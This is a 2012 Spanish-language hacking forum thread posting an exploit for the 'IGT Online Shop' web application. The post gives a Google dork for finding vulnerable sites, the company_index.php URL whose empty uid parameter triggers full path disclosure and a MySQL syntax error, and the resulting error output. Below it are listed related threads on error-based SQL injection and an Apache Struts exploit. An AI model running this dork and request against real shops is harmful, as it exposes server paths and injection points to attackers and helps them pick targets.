3. Exploit Full path disclosure and Sql Error ONLINE SHOP IGT
Páginas: [1]   Ir Abajo
« anterior próximo »

Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

  • 0 Respuestas
  • 2652 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
  • Skype: Maztor-
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email

Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

  • en: Abril 05, 2012, 09:20:06 pm
Código: [Seleccionar]
# Author: Mazt0r
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]



----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
======================== Camaradas! DDLR & CL ========================================
Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer
-------------------------------------------------------------------------------------
« Última modificación: Abril 05, 2012, 10:39:22 pm por MaztoR »
En línea
-------------------------------------
| Twitter: @Mazt0r                
| Site: www.maztor.com        
| Skype: Maztor-                    
-------------------------------------
Páginas: [1]   Ir Arriba
« anterior próximo »
 

Mysql injection avanzada: "doble query/error based"

Iniciado por q3rv0

 Respuestas: 2
Vistas: 4309 		Último mensaje Agosto 30, 2012, 04:26:01 am
por andrewtwo
Destripando la logica de una inyeccion [Mysql Doble Query Error Based]

Iniciado por q3rv0

 Respuestas: 4
Vistas: 4505 		Último mensaje Junio 15, 2013, 11:08:53 am
por morodog
Double query Error Based Sql Injection

Iniciado por arthusu

 Respuestas: 0
Vistas: 2857 		Último mensaje Abril 10, 2013, 05:01:53 am
por arthusu
XSS a travez de ERROR

Iniciado por q3rv0

 Respuestas: 1
Vistas: 3572 		Último mensaje Agosto 26, 2012, 06:11:11 pm
por hdbreaker
Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

 Respuestas: 9
Vistas: 8460 		Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248